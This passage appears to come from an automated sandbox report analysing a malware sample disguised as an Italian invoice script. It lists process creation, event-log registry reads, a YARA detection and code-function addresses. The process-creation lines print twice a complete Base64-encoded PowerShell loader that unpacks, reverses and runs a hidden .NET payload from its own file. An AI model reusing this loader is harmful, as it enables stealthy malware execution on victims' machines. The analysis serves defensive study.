AgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA	Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A035480 NtProtectVirtualMemory,	7_2_0A035480
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A036D08 NtResumeThread,	7_2_0A036D08
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A035478 NtProtectVirtualMemory,	7_2_0A035478
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A036D00 NtResumeThread,	7_2_0A036D00
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CE6D08 NtResumeThread,	15_2_09CE6D08
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CE5480 NtProtectVirtualMemory,	15_2_09CE5480
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CE6D00 NtResumeThread,	15_2_09CE6D00
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 15_2_09CE5478 NtProtectVirtualMemory,	15_2_09CE5478

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_02F9AA89	7_2_02F9AA89
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_02F9EA60	7_2_02F9EA60
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_02F9AA89	7_2_02F9AA89
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_02F9EDE8	7_2_02F9EDE8
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A03F8B8	7_2_0A03F8B8
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A031D70	7_2_0A031D70
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A03F8AA	7_2_0A03F8AA
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A032CA0	7_2_0A032CA0
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A0E0006	7_2_0A0E0006
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A0E0040	7_2_0A0E0040
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A35E288	7_2_0A35E288
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A340006	7_2_0A340006
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 7_2_0A340040	7_2_0A340040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A51C00	9_2_00A51C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A53416	9_2_00A53416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A54870	9_2_00A54870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A551C0	9_2_00A551C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A551D0	9_2_00A551D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A51978	9_2_00A51978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A5426C	9_2_00A5426C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A51FA9	9_2_00A51FA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A51F94	9_2_00A51F94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A51FCA	9_2_00A51FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00A51C00	9_2_00A51C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02342B68	9_2_02342B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02342B47	9_2_02342B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023D9010	9_2_023D9010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023D098D	9_2_023D098D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023DD768	9_2_023DD768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023D9000	9_2_023D9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023DD96D	9_2_023DD96D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023DCF60	9_2_023DCF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023DD758	9_2_023DD758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023DCF50	9_2_023DCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_023D2FF2	9_2_023D2FF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0497B820	9_2_0497B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04975B18	9_2_04975B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0497A7BF	9_2_0497A7BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0497D8D0	9_2_0497D8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0497D8C1	9_2_0497D8C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0497B80F	9_2_0497B80F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C37C5F	9_2_04C37C5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C3D197	9_2_04C3D197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C38D08	9_2_04C38D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04C37F97	9_2_04C37F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F274E0	9_2_04F274E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2E1F2	9_2_04F2E1F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F29D28	9_2_04F29D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2D880	9_2_04F2D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2A940	9_2_04F2A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2FA00	9_2_04F2FA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F274D0	9_2_04F274D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2348B	9_2_04F2348B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F275F7	9_2_04F275F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F27554	9_2_04F27554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2451C	9_2_04F2451C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F26668	9_2_04F26668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F26658	9_2_04F26658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2778F	9_2_04F2778F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2A070	9_2_04F2A070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F23F6E	9_2_04F23F6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2D87F	9_2_04F2D87F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F27833	9_2_04F27833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F24817	9_2_04F24817
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F2F9F1	9_2_04F2F9F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_04F23A60	9_2_04F23A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0552C0C8	9_2_0552C0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_05691367	9_2_05691367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_05691378	9_2_05691378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_05697DE8	9_2_05697DE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_05697DD7	9_2_05697DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668B8A8	9_2_0668B8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_066811D0	9_2_066811D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06684EEB	9_2_06684EEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668468E	9_2_0668468E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668AF20	9_2_0668AF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668B47B	9_2_0668B47B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668B474	9_2_0668B474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668B45B	9_2_0668B45B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668AC30	9_2_0668AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668B260	9_2_0668B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668B270	9_2_0668B270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_066892D9	9_2_066892D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0668937C	9_2_0668937C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06689372	9_2_06689372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_066893AA	9_2_066893AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0675D6F0	9_2_0675D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0675EF08	9_2_0675EF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06752F8F	9_2_06752F8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0675E4C0	9_2_0675E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0675423C	9_2_0675423C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06756238	9_2_06756238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06752398	9_2_06752398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06756C71	9_2_06756C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06756C80	9_2_06756C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06756228	9_2_06756228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06756319	9_2_06756319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0675BBF8	9_2_0675BBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_06758167	9_2_06758167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F176A	9_2_067F176A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F1FE0	9_2_067F1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F6560	9_2_067F6560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F6D90	9_2_067F6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067FFBA0	9_2_067FFBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F4978	9_2_067F4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F89A0	9_2_067F89A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067FDE21	9_2_067FDE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F1FD0	9_2_067F1FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067FFC3C	9_2_067FFC3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067FD4A8	9_2_067FD4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F0D60	9_2_067F0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F654F	9_2_067F654F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F6D80	9_2_067F6D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F0A92	9_2_067F0A92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F0B3B	9_2_067F0B3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F0B9B	9_2_067F0B9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067FFB90	9_2_067FFB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_067F0040	9_2_067F0040
